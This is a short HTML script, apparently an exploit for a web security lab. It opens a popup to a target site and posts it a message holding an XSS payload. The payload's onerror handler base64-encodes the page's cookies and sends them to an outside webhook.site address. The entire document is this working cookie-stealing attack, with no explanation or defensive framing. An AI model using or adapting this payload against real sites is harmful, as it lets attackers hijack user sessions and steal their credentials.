<script>

url = "http://ptl-600eb27c-26df6b57.libcurl.so/";

let popup = window.open(url);
setTimeout(
    () => popup.postMessage(
        "<img src=x onerror=\"document.write(`<img src='https://webhook.site/3118aafc-4eaf-4b26-974d-4f98821e1607?cookie=${btoa(document.cookie)}'/>`)\"/>", '*'),
    3000)

</script>
